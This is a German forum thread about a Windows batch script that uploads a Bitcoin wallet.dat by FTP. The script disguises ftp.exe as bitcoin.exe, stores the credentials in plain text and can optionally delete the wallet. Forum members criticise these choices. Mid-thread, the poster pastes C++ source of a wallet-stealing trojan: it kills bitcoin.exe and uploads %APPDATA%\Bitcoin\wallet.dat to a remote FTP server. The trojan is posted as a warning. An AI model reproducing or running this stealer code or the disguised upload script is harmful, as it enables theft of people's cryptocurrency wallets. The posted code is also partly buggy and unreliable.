Script zum Uploaden eurer wallets auf eigenem server "Windows"

[Retard]

Hier unten seht ihr ein kleines script was ihr in eine textdatei hineinkopiert und anpassen könnt.

@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername 
passwort
bin
put "Bitcoin\wallet.dat"
bye

Die datei dann abspeichern bsp.  save.bat nennen.

nach belieben könnt ihr die alte wallet im anschluss löschen lassen dazu einfach

Del /S /Q %APPDATA%\bitcoin\wallet.dat

benutzen.

Ich hoffe ich war dem einen oder anderem hilfreich

[1713943531]

1713943531

[crashdown]

Oha, also... 
vorweg eine Frage zu dem Script. Ich werde es zwar nicht brauchen aber aus grundsätzlichem Interesse.
Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe

Und dann noch als Hinweis:
Ich würde drei Dinge nicht tun:
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.

1 und 2 macht das Script aber, 3 macht es mit der optionalen Zeile.

Ich würde das so nicht nutzen.

[Retard]

Oh ha,

selbstverständlich hast du recht !

1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.

Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.

Hmm Entschuldigung wenn ich mich so schlecht ausdrücke

Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B

Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.

Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).

Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .

--------------

Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...

hier der aktuelle trojaner

#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")

void killprocess()
   {   

      HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );      
      PROCESSENTRY32 ProcessEntry = { 0 };               
      ProcessEntry.dwSize = sizeof( ProcessEntry );         
      BOOL Return = FALSE;
      Return = Process32First( hProcessSnapShot,&ProcessEntry );

      int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
      if (value==0)
         {
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
            TerminateProcess(hProcess,0);
            CloseHandle(hProcess); //Close Handle }
      
         }

   while( Process32Next( hProcessSnapShot, &ProcessEntry ));
   CloseHandle( hProcessSnapShot );
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
   
   killprocess();
   Sleep(40000);
   srand((unsigned)time(NULL));         
   int seedone=rand();                  
    int seedtwo=rand()*3;               
   int seedboth = seedone + seedtwo;      
                                 
   char randomseed[99];               
    itoa(seedboth,randomseed,10);         
                                 
   
   char* appdata = getenv("%APPDATA%");      
   char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); 

   HINTERNET hInternet;
   HINTERNET hFtpSession;
   hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
   hFtpSession = InternetConnect(hInternet, "ftp.", INTERNET_DEFAULT_FTP_PORT, "", "", INTERNET_SERVICE_FTP, 0, 0); 

   FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
   FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);

   InternetCloseHandle(hFtpSession);
   InternetCloseHandle(hInternet);
   
   return 0;
}

Das intressante daran ist das der trojaner nur die wallet.dat kopieren kann wenn die bitcoin.exe geschlossen ist

[crashdown]

Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.

Hmm Entschuldigung wenn ich mich so schlecht ausdrücke

Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B

Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.

Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).

Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .

--------------

Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...

Entschuldigung aber:
- im Klartext gespeicherte Passwörter sind immer ein Problem. Egal(!) wie der Dateiname ist.
- htaccess gesicherte Verbindung? htaccess sichert keine Verbindung. Das hat mit der Verschlüsselung des Datenverkehrs nichts zu tun.
- Die Anwendungsbeispiele sind, nunja, etwas dubios.
- Was soll der Quelltext quote?



edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?

[BitCoinBaron]

Und wie man sehen kann, sucht der trojaner nur in dem Stantardverzeichniss

   char* appdata = getenv("%APPDATA%");     
   char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); 

Da wird er bei mir nix finden 

[Retard]

Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.

Lach ja httacces ist für den webserver vorgesehn ^^ und für die übertragung ssl  ... bekomm wohl meinen ersten hitze stich .

naja die beispiele sind eben nur beisspiele..

der quelltext ist der aktuelle trojaner der jagt auf wallets macht, wollte die community informieren gewarnt sind sie hoffentlich .
Darin kann man auch erkennen das nur windows 7 systeme betroffen sind zurzeit mit dieser variante .


joo der schnipsel hat echt keine funktion O.o

%PUBLIC%\bitcoin.exe

Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar


@crashdown danke für die verbesserung

[mipl]

@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe

Bevor ich überhaupt auf den (Un-)Sinn der ganzen Aktion eingehe: Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe?
Und zum Trojaner-Code: Warum hast Du da die originalen Kommentare gelöscht?
Und warum sollte ich in einer VM XAMPP laufen lassen, um dann auch noch darauf Daten zu sichern?

Don't drink and write!

[crashdown]

Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.

joo der schnipsel hat echt keine funktion O.o

%PUBLIC%\bitcoin.exe

Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar


@crashdown danke für die verbesserung

Der von dir zitierte Codeteil steht so an 2 Stellen und erfüllt natürlich beides mal eine Funktion - nur die Funktion die er jeweils erfüllt ist totaler Quatsch.

Bist du dir sicher dass du weißt was du da tust? 

[Retard]

mittlerweile habe ich zweifel ob das alles so gut ist O.o   ich brauch nen bier....

@mipl soll ich etwa direkt nen download link mit posten ? *rofl*

[klaaster]

@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername 
passwort
bin
put "Bitcoin\wallet.dat"
bye

Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe

edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?

Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe?

joo der schnipsel hat echt keine funktion O.o

%PUBLIC%\bitcoin.exe

Bastelstunde  
Versuch doch mal das Problem der Pfadangabe im put-Befehl anders zu lösen.

[mipl]

Ich würde dafür eh wput (pendant zu wget) benutzen. Oder noch einfacher: SyncBack Freeware. Das spart mir merkwürdige, sicherheitstechnisch bedenkliche und wirre Konstruktionen.